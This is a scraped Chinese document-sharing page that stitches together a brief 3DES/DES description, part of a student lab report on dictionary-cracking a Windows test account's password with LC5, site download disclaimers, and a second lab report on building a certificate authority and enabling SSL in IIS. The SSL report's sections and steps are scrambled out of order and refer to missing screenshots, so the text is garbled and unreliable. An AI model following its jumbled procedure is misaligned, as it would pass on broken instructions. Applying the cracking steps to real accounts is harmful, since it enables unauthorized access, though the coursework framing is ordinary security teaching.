(2).3DES加密算法:3DES又称Triple DES,是DES加密算法的一种模式,它使用3条56位的密钥对数据进行三次加密。

数据加密标准(DES)是美国的一种由来已久的加密标准,它使用对称密钥加密法,并于1981年被ANSI组织规范为ANSI X.3.92。

DES使用56位密钥和密码块的方法,而在密码块的方法中,文本被分成64位大小的文本块然后再进行加密。

20155301滕树晨信息安全技术实验二口令破解

20155301滕树晨信息安全技术实验二口令破解

20155301滕树晨信息安全技术实验⼆⼝令破解20155301滕树晨信息安全技术实验⼆⼝令破解实验⽬的1.了解Windows⼝令破解原理2.对信息安全有直观感性认识3.能够运⽤⼯具实现⼝令破解实验⼈数1.⼀⼈系统环境1.Windows实验⼯具1.LC52.SuperDic实验内容1.使⽤⼯具实现⼝令破解2.⼝令破解主要有两种⽅法:字典破解和暴⼒破解实验原理3.字典破解是指通过破解者对管理员的了解,猜测其可能使⽤某些信息作为密码,例如其姓名、⽣⽇、电话号码等,同时结合对密码长度的猜测,利⽤⼯具来⽣成密码破解字典。

如果相关信息设置准确,字典破解的成功率很⾼,并且其速度快,因此字典破解是密码破解的⾸选。

4.⽽暴⼒破解是指对密码可能使⽤的字符和长度进⾏设定后(例如限定为所有英⽂字母和所有数字,长度不超过8),对所有可能的密码组合逐个实验。

随着可能字符和可能长度的增加,存在的密码组合数量也会变得⾮常庞⼤,因此暴⼒破解往往需要花费很长的时间,尤其是在密码长度⼤于10,并且包含各种字符(英⽂字母、数字和标点符号)的情况下。

实验过程字典破解1.建⽴测试账户。

在测试主机上建⽴⽤户名“test”的账户,⽅法是依次打开“控制⾯板” “管理⼯具” “计算机管理”。

在“本地⽤户和组”下⾯右击“⽤户”,选择“新⽤户”,⽤户名随意选取即可,这⾥我选择的是⾃⼰的学号“20155301”,密码则是设为⾃⼰的⽣⽇。

2.进⼊实验平台,单击⼯具栏“字典⽣成器”按钮,启动“字典⽣成器”。

选择“⽣⽇”标签页,输⼊的年份与⽉份信息应尽量包含步骤(1)中⽤到的⽣⽇⽇期,在“⽣成字典”标签页中确定字典⽂件存放的路径以及新⽤户⼝令位数,最后⽣成字典⽂件3.单击⼯具栏“LC5”按钮,启动LC5⼝令破解⼯具。

选择“Session”(会话)|“Session Options…”(会话选项)菜单项,在弹出的“Auditing Options For This Session”对话框中选中“Dictionary Crack”项的“Enabled”,取消其它项的“Enabled”。

  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
,这里浏览,选择你刚刚下载的证书:
,下一步-此网站应该使用的SSL端口:443(默认)-下一步:
自己所用版本:
,完成。
(8)配置Web站点来使用SSL。回到默认站点属性的目录安全性-安全通信-编辑-勾选“要求安全通道(SSL)”:
,确定-再应用-确定
四、实验结果与结论:(核心代码和程序的运行效果)
(1)输入刚刚的网址:http://localhost/CertSrv/default.asp,会显示:
双击发机构服务器。先配置IIS,在控制面板里选择添加/删除程序,再选安装/删除Windows组件,然后勾选应用程序服务器。
然后下一步,等待安装完成。完成后,可点中详细信息查看IIS.
然后继续添加证书服务。控制面板-添加或删除程序-添加/删除Windows组件-,同上勾选证书服务,按照Windows组件安装向导开始安装证书。默认独立根CA(S),下一步-公用名(随意,我是参照网上的名称):
生成,生成加密密钥,保存在C盘:
(第二个截图,你用的):
提示停止Internet信息服务,点“是”:
,确定后:
,选中浏览,插入U盘,进入Windows server2003.iso的解压文件夹,它自动进入所需文件的文件夹:
,打开,确定;之后,重复一样的步骤,然后:
,“是”,完成。现在表示安装证书颁发服务器完成。
,根据提示在http后加个s,再Enter:
五、实验中遇到的问题及解决办法:
(3)创建证书请求。管理工具-Internet信息服务管理器,展开-网站-默认网站-属性-目录安全性-服务器证书:
看一下自己所用版本:
接着,下一步-新建证书:
,下一步:
,下一步:
,下一步-默认,下一步:
,下一步:
,下一步:
自己所用版本:
,下一步,完成。创建证书请求完成。
(4)提交证书请求。这部分是要从Web服务器把证书请求提交到证书服务器。打开Internet Explorer,地址栏输入:http://localhost/CertSrv/default.asp
你用的:
颁发,然后可以在颁发的证书中查看刚刚颁发的证书:
自己所用版本:
(6)下载证书。进入刚刚进入的网站:http://localhost/CertSrv/default.asp,然后在这个页面点中“查看挂起的证书”-“保存的申请证书”:
,点中“下载证书”,保存。
(7)配置Web站点来使用SSL证书。回到刚刚进入的Internet信息服务管理器,默认网站属性-目录安全性-服务器安全性-下一步-处理挂起的请求并安装证书,下一步:
“申请证书”,然后选择“高级证书申请”,接着选择“使用base64编码的CMC或…文件续订证书申请”。打开之前在C盘保存的“certreq.txt”,将其内容复制到下窗口,然后提交,提交后会显示:
(5)颁发证书。服务器在申请证书之后,需要通过证书服务器的验证,下面进行证书颁发:管理工具-证书颁发机构-Server.Root CA,展开-挂起的申请:
二、实验内容:
(1)列举浏览器所配置的受信任的证书颁发机构;(2)安装并配置证书颁发机构服务器;(3)创建证书请求;(4)颁发/签署证书;(5)用SSL安全化Web站点;(6)描述当以SSL连接时Web页面使用的过程。
三、实验步骤:
(1)Web浏览器通常配置了许多来自证书颁发机构的证书,在Windows server2003中查看这些证书:打开Internet Explorer-工具-Internet选项-内容-证书-受信任的根证书颁发机构;
实验报告
填写时间:
课程名称
信息安全原理与技术
实验名称
Windows中使用证书和SSL
姓名
姜敏
学号
020
专业年级
10计一
一、实验目的:
本实验中将首先看看默认情况下什么证书颁发机构被配置来与浏览器合作。然后创建一个证书颁发机构服务器,设置一个Web服务器来使用使用SSL,并测试新的配置。实验环境为window server2003。
相关文档
最新文档